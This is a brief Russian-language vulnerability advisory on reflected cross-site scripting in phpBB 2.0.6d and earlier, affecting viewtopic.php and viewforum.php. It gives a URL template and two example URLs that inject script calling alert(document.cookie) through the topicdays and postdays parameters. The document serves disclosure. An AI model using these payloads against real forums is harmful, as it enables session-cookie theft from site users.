Программа: phpBB 2.0.6d и более ранние версии 

Уязвимость обнаружена в phpBB в ‘viewtopic.php’ и ‘viewforum.php’. Удаленный пользователь может выполнить XSS нападение. 

viewforum.php?f=[FNUM]&topicdays =[DNUM][XSS]
viewforum.php?f=1&topicdays=99"> <script>alert(document.cookie)<;/script>&star t=30
viewtopic.php?t=10&postdays=99"> <script>alert(document.cookie)<;/script>&start=20



Оставить мнение